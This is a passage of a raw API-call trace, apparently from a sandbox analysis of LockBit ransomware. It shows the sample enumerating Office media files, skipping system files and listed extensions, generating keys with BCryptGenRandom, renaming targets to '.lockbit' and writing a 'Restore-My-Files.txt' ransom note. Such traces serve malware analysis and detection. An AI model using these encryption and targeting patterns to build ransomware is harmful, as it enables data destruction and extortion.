lstrcmpiW (lpString1="..", lpString2="J0285698.WMF") returned -1 [0197.538] PathFindExtensionW (pszPath="J0285698.WMF") returned=".WMF" [0197.538] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.538] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.539] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.539] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285698.WMF") returned 1 [0197.540] lstrcmpiW (lpString1="ntldr", lpString2="J0285698.WMF") returned 1 [0197.540] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285698.WMF") returned 1 [0197.540] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285698.WMF") returned -1 [0197.540] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285698.WMF") returned -1 [0197.540] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285698.WMF") returned 1 [0197.540] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285698.WMF") returned -1 [0197.540] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.540] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF") returned=".WMF" [0197.540] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.540] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.540] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.541] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.541] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF.lockbit") returned 70 [0197.541] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285698.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.543] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.543] malloc (_Size=0x40068) returned 0x3df0008 [0197.543] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10770) returned 1 [0197.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.544] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.544] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0197.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.550] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.550] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.550] free (_Block=0x1fa2ed8) [0197.550] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285698.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.550] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.550] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1e00, ftCreationTime.dwHighDateTime=0x1befd7b, ftLastAccessTime.dwLowDateTime=0xbd5d1680, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x9ecd1e00, ftLastWriteTime.dwHighDateTime=0x1befd7b, nFileSizeHigh=0x0, nFileSizeLow=0x958c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285750.WMF", cAlternateFileName="")) returned 1 [0197.550] lstrcmpiW (lpString1=".", lpString2="J0285750.WMF") returned -1 [0197.550] lstrcmpiW (lpString1="..", lpString2="J0285750.WMF") returned -1 [0197.550] PathFindExtensionW (pszPath="J0285750.WMF") returned=".WMF" [0197.550] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.550] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.550] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.551] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.551] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.552] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285750.WMF") returned 1 [0197.552] lstrcmpiW (lpString1="ntldr", lpString2="J0285750.WMF") returned 1 [0197.552] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285750.WMF") returned 1 [0197.552] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285750.WMF") returned -1 [0197.552] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285750.WMF") returned -1 [0197.552] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285750.WMF") returned 1 [0197.552] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285750.WMF") returned -1 [0197.552] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.552] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF") returned=".WMF" [0197.553] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.553] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.553] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.554] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.554] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.554] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF.lockbit") returned 70 [0197.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0285750.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0197.555] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0197.555] malloc (_Size=0x40068) returned 0x3df0008 [0197.555] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=38284) returned 1 [0197.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.556] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0197.556] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.557] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.557] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0197.557] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0197.560] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0197.562] malloc (_Size=0xa2) returned 0x1fa2ed8 [0197.562] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0xc0000008 [0197.562] free (_Block=0x1fa2ed8) [0197.562] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285750.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0197.562] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0197.562] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0197.562] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95908100, ftCreationTime.dwHighDateTime=0x1befd7c, ftLastAccessTime.dwLowDateTime=0xbd5f77e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x95908100, ftLastWriteTime.dwHighDateTime=0x1befd7c, nFileSizeHigh=0x0, nFileSizeLow=0x3452, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0285926.WMF", cAlternateFileName="")) returned 1 [0197.562] lstrcmpiW (lpString1=".", lpString2="J0285926.WMF") returned -1 [0197.562] lstrcmpiW (lpString1="..", lpString2="J0285926.WMF") returned -1 [0197.562] PathFindExtensionW (pszPath="J0285926.WMF") returned=".WMF" [0197.562] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0197.562] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0197.563] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0197.563] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0285926.WMF") returned 1 [0197.564] lstrcmpiW (lpString1="ntldr", lpString2="J0285926.WMF") returned 1 [0197.564] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0285926.WMF") returned 1 [0197.564] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0285926.WMF") returned -1 [0197.564] lstrcmpiW (lpString1="autorun.inf", lpString2="J0285926.WMF") returned -1 [0197.564] lstrcmpiW (lpString1="thumbs.db", lpString2="J0285926.WMF") returned 1 [0197.564] lstrcmpiW (lpString1="iconcache.db", lpString2="J0285926.WMF") returned -1 [0197.564] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0197.564] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0285926.WMF") returned=".WMF" [0197.564] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.564] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0197.564] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0197.565] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0197.565] 